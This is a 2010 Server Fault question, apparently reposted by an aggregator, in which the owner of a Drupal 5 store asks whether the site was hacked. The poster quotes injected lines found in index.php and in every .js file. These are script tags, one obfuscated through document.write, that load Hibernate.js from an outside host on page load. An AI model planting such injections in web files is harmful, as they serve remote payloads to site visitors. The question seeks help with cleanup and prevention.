Has my site been attacked?

Posted by fretje on Server Fault See other posts from Server Fault or by fretje
Published on 2010-06-16T13:15:23Z Indexed on 2010/06/16 13:23 UTC
Read the original article Hit count: 237

Filed under:
|
|

This is about an online store based on Drupal 5.

All of a sudden it didn't work anymore. Upon accessing the site, this error came up:

Parse error: syntax error, unexpected '<' in /home/public_html/index.php on line 38

Upon further inspection I found the following two lines at the end of said index.php:

<script type="text/javascript" src="http://blog.nodisposable.com:8080/Hibernate.js"></script>
<!--7379ba6e55616ea66ac9d812fc0597ba-->

After manually removing those 2 lines, the site seems to work fine again.

But after more problems (with editing pages) were reported, I found out that actually all the *.js files are "infected". They all contain an extra line at the end:

document.write('<s'+'cript type="text/javascript" src="http://blog.nodisposable.com:8080/Hibernate.js"></scr'+'ipt>');

Has this site been hacked? Upon googling for "blog.nodisposable.com", nothing interesting comes up. That site itself seems legitimate. It's probably hacked itself?

Can anybody explain how this could have happened? What I can do to reverse this? And what I can do to avoid this in the future?

© Server Fault or respective owner

Related posts about website

Related posts about JavaScript